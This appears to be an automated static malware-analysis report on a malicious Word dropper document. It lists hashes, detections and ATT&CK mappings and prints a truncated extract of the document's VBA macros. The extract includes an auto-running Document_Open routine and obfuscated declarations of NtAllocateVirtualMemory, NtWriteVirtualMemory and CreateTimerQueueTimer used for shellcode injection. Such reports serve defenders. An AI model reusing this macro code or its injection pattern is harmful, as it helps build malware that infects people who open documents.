Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 45ce33d346184499…

MALICIOUS

Office (OLE)

Size: 182.0 KB
Created: 2017-11-08 14:40:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 7cc19381a10c7dfeaa198daff16046e6
SHA-1: 3b4673964778a38545c6ba43be04c7af5a70fe07
SHA-256: 45ce33d3461844999b883db1b54a51a37ac85115f17aea24906be23362562235
Risk Score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6369142-0', indicating it functions as a dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the malicious payload is executed automatically upon opening the document. While the VBA code is truncated, the declared functions like 'NtAllocateVirtualMemory' and 'NtWriteVirtualMemory' from 'ntdll.dll' point towards memory manipulation, a common technique for loading and executing shellcode or second-stage malware. The overall intent appears to be the execution of a malicious payload, likely downloaded from an external source, making it a spearphishing attachment.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6369142-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6369142-0
  • VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35330 bytes
SHA-256: 60e7549cf0e951de730826400a2ef45083bd8e1432527a51ca071ce5632e2296

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub Document_Open()
Dim newspaper As Integer
Dim chignon As Variant
groundnut = "solicitor"
apollons.oriya
kishke = 90 + 4
Pmt 0, kishke, 16112, 47021, 6
End Sub



Attribute VB_Name = "cassiope"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Ich warte hier
'  Doch ich weiГџ dass es dich gibt
Public Declare Function roundsman Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal cic As Any, combative As Any, bourgogne As Any, headsup As Any) As Long
'  He comes to me every night
'  Ich warte hier
Public Declare Function interception Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal bookish As Any, blister As Any, passionqueller As Any, mucoid As Any) As Long
'  With his hands around my neck
'  Sometimes love seems so far
Public Declare Function peerage _
Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (truncated As Long, maestoso As Long, ByVal freudian As Long, highmindedByVal As Long, await As Long, ByVal energy As Long) As Long
'  irgendwer mich liebt
'  Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function medley _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal timeswitch As Any, ByVal veal As Any, ByVal lysimachus As Any, ByVal heraldic As Any, ByVal myctophidae As Any) As Long
'  Die Nacht Г¶ffnet ihren SchoГџ
'  Die Nacht Г¶ffnet ihren SchoГџ
Public Declare Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (discountenance As Any, ByVal calcine As Any, ByVal gymnura As Any, ByVal forthcoming As Any, ByVal antigropelos As Any, ByVal reestate As Any, ByVal revendicate As Any) As Long
'  Die Nacht Г¶ffnet ihren SchoГџ
'  Dont die before I do
#End If


'  In my dreams he does exist
'  Sometimes love seems so far
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  His passion is a kiss
'  Ich warte hier
Public Declare PtrSafe Function dysmenorrhea Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal barrage As Any, aphonia As Any, empress As Any, celtis As Any) As LongPtr
'  I know that you exist
'  I dont know who he is
Public Declare PtrSafe Function medley _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal flagellate As Any, ByVal epiphytic As Any, ByVal paleozoology As Any, ByVal clipboard As Any, ByVal bahamian As Any) As LongPtr
'  I dont know who you are
'  Sometimes love seems so far
Public Declare PtrSafe Function peerage _
Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (drown As LongPtr, marriageability As LongPtr, ByVal bloodlessly As LongPtr, applicationsByVal As LongPtr, atrophic As LongPtr, ByVal ichthyolatry As LongPtr) As LongPtr
'  Ich weiAY dass irgendwann
'  Dont die before I do
Public Declare PtrSafe Function kris Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal formerly As Any, shoddily As Any, avibus As Any, kalotermitidae As Any) As LongPtr
'  Ich warte hier
'  irgendwer mich liebt
Public Declare PtrSafe Function unfathomable Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (affenpinscher As Any, ByVal unshaped As Any, ByVal borate As Any, ByVal bumpiness As Any, ByVal compages As Any, ByVal cello As Any, ByVal spergula As Any) As Long
'  Doch ich weiAY dass es dich gibt
'  Ich warte hier
#End If



Attribute VB_Name = "unobtrusive"
Attribute VB_Base = "0{F89CB859-E800-4982-91EA-E22374C77730}{49DE4848-A0DA-4E26-9BC2-07C4D593AA63}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "apollons"
Function gayety(unresolved, gingle, airmail)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim dolabriform As Byte
Dim feels As Variant
Dim mayaca
... (truncated)